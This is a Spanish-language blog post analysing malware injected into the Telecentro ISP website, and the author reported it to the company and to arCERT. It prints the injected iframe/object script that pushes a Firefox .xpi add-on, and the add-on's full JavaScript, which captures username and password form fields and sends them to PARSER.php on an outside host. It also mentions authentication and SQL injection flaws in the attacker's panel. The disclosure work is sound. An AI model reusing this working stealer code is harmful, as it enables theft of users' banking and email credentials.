Introduccion
Esta semana pensamos pasarnos a Telecentro en casa por los servicios que ofrecen y precios publicados (ofrecen un ahorro de costo importante comparado con otras empresas con cobertura en esta zona).
Queriendo conseguir un telefono de contacto para obtener mas informacion, es como voy al sitio web de esta empresa. Gran sorpresa cuando veo una advertencia de mi navegador Firefox, avisandome que este sitio quiso instalar un plug-in...
Detalles técnicos
Al abrir el codigo fuente de la pagina, no tarde mucho tiempo en encontrar en sus ultimas lineas, el siguiente codigo JavaScript:
<script>
var firefox= navigator.userAgent.toLowerCase().indexOf("firefox/") < -1;
if (firefox){
document.write("<iframe src='http://www.pastillasdelabuelo.com.ar/backoffice/_/install.xpi' width='0%' height='0' align='center'></iframe>");
}
</script>
<object id="thePlugin" type="application/x-myplugin" width="1" height="1" codebase="http://www.pastillasdelabuelo.com.ar/backoffice/_/install.xpi" >
Este script realiza lo siguiente:
- Verifica el tipo de navegador que posee el usuario. (Internet Explorer, Firefox, Chrome, etc...)
- Si es Firefox, escribe un IFRAME que apunta al sitio web http://www.pastillasdelabuelo.com.ar/ el cual aloja un archivo llamado install.xpi
Obviamente no instale el plug-in, pero procedi a descargarlo. Acto seguido lo subi a VirusTotal y esto es lo que obtuve...
Nada. No se lo reconoce como virus...
Una vez descomprimido el .xpi encuentro el siguiente codigo en el archivo /install/chrome/content/script.js:
gBrowser.addEventListener('DOMContentLoaded',conchaslocas,false);
function conchaslocas(){
function CrearObj()
{
var obj="";
if(window.XMLHttpRequest)
{
obj = new XMLHttpRequest();
}
return obj;
}
function cargar(cont)
{
obj1=CrearObj();
obj1.open('GET','http://www.pastillasdelabuelo.com.ar/backoffice/_/PARSER.php?content='+cont);
obj1.send('');
}
function choriar(inp){
var forms = content.document.getElementsByTagName("form");
var inputs = inp;
contenido="";
haspass=0;
for(var i=0;i<inputs.length;i++)
{
if(inputs[i].type=="text" || inputs[i].type=="password" || inputs[i].type=="email")
{
if(inputs[i].type=="password")
{
haspass=1;
}
contenido=contenido+inputs[i].name+"="+inputs[i].value+"|";
}
}
if(haspass==1){
contenido=contenido+"from="+content.document.location.href;
cargar(contenido);
}
}
for(r=0;r<content.document.getElementsByTagName("form").length;r++)
{
content.document.getElementsByTagName("form")[r].addEventListener("submit", function(){choriar(this.getElementsByTagName("input"))}, false);
}
}
Basicamente lo que hace este script, una vez instalado en el sistema es modificar las paginas que visita el usuario y en el caso de encontrar alguna con un formulario con campos del tipo Usuario y Clave, envia estos datos a un script .php mientras deja fluir normalmente la navegacion del usuario para pasar desapercibido.
Conclusion
Este tipo de episodios nos recuerdan una vez mas, no confiar en un sitio aunque pertenezca a una empresa u organismo reconocido. Y ante la un cartel indicando que dicho sitio desea instalar software en nuestro equipo, que nuestra primera reaccion sea la de apretar el boton 'NO' (por si las dudas..). Telecentro fue contactado telefonicamente y por email con los detalles de este problema, pero no tengo respuestas aun.
Actualizacion @ 21:49hs
En una rapida mirada al backoffice de la pagina www.pastillasdelabuelo.com.ar/backoffice/ veo que el formulario de autenticacion practicamente no tiene control alguno y debido a un error en su implementacion, se puede acceder a el sin necesidad de conocer previamente nombre de usuario ni clave... Esto da un indicio de por donde han podido los atacantes subir el fichero .php que recolecta las credenciales de los usuarios infectados...
Actualizacion 11 de Marzo @ 0:45hs
No pude acceder aún al código fuente del fichero PARSER.php, pero corroboré que los datos siguien siendo robados y se encuentra almacenados en la Base de Datos del sitio www.pastillasdelabuelo.com.ar
Hasta la fecha se contabilizaron mas de 3400 registros con nombre de usuario, clave y sitio web al que pertenecen dichos datos, de personas infectadas por este software malicioso. Hay datos de acceso a HomeBanking de bancos argentinos, datos de acceso a cuentas de correo como Gmail, Live, Yahoo, Ciudad, etc y de organismos públicos como Universidades y organismos de gobierno como Arba del Gobierno de la Ciudad de Buenos Aires. También hay datos de acceso a cuentas de correo de empresas como IBM Argentina. Hay datos de acceso a cuentas de Facebook, etc.
Los datos son accesibles a traves de un fallo en el mecanismo de autenticación del panel de control o BackEnd del sitio anteriormente nombrado y una vulnerablidad de Inyección de Código SQL en el aplicativo.
Toda la información recolectada fué enviada y denunciada ante el arCERT el día Sábado. Aún no se recibió respuesta alguna.
Actualizacion 11 de Marzo @ 15:09hs
La página de Telecentro ya fué reestablecida y el código malicioso eliminado.
Con respecto al sitio www.pastillasdelabuelo.com.ar, sigue alojando el archivo .xpi malicioso. Su BackOffice sigue siendo vulnerable a accesos no autorizados y por ende a su base datos también:
Y desde el arCERT no he recibido respuesta alguna tampoco, sobre mi denuncia. (Ni un gracias por lo menos...) En fin, así está el país.
P.D.: Los datos robados siguen en la base de datos del sitio www.pastillasdelabuelo.com.ar
